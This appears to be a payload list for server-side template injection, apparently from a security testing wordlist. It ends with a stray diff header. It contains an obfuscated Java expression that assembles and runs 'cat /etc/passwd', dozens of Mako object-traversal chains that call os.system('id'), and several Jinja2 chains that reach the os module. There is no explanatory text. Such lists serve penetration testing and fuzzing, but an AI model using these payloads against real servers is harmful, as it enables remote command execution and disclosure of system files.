 ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}${self.module.cache.util.os.system("id")}
 ${self.module.runtime.util.os.system("id")}
 ${self.template.module.cache.util.os.system("id")}
 ${self.module.cache.compat.inspect.os.system("id")}
 ${self.__init__.__globals__['util'].os.system('id')}
 ${self.template.module.runtime.util.os.system("id")}
 ${self.module.filters.compat.inspect.os.system("id")}
 ${self.module.runtime.compat.inspect.os.system("id")}
 ${self.module.runtime.exceptions.util.os.system("id")}
 ${self.template.__init__.__globals__['os'].system('id')}
 ${self.module.cache.util.compat.inspect.os.system("id")}
 ${self.module.runtime.util.compat.inspect.os.system("id")}
 ${self.template._mmarker.module.cache.util.os.system("id")}
 ${self.template.module.cache.compat.inspect.os.system("id")}
 ${self.module.cache.compat.inspect.linecache.os.system("id")}
 ${self.template._mmarker.module.runtime.util.os.system("id")}
 ${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
 ${self.template.module.filters.compat.inspect.os.system("id")}
 ${self.template.module.runtime.compat.inspect.os.system("id")}
 ${self.module.filters.compat.inspect.linecache.os.system("id")}
 ${self.module.runtime.compat.inspect.linecache.os.system("id")}
 ${self.template.module.runtime.exceptions.util.os.system("id")}
 ${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
 ${self.context._with_template.module.cache.util.os.system("id")}
 ${self.module.runtime.exceptions.compat.inspect.os.system("id")}
 ${self.template.module.cache.util.compat.inspect.os.system("id")}
 ${self.context._with_template.module.runtime.util.os.system("id")}
 ${self.module.cache.util.compat.inspect.linecache.os.system("id")}
 ${self.template.module.runtime.util.compat.inspect.os.system("id")}
 ${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
 ${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
 ${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
 ${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
 ${self.template.module.cache.compat.inspect.linecache.os.system("id")}
 ${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
 ${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
 ${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
 ${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
 ${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
 ${self.template.module.filters.compat.inspect.linecache.os.system("id")}
 ${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
 ${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
 ${self.context._with_template._mmarker.module.cache.util.os.system("id")}
 ${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
 ${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
 ${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
 ${self.context._with_template.module.cache.compat.inspect.os.system("id")}
 ${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
 ${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
 ${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
 ${self.context._with_template.module.filters.compat.inspect.os.system("id")}
 ${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
 ${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
 ${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
 {{self._TemplateReference__context.cycler.__init__.__globals__.os}}
 {{self._TemplateReference__context.joiner.__init__.__globals__.os}}
 {{self._TemplateReference__context.namespace.__init__.__globals__.os}}
 {{cycler.__init__.__globals__.os}}
 {{joiner.__init__.__globals__.os}}
 {{namespace.__init__.__globals__.os}}
--- a/vulnerabilities/juicy_files.txt
+++ b/vulnerabilities/juicy_files.txt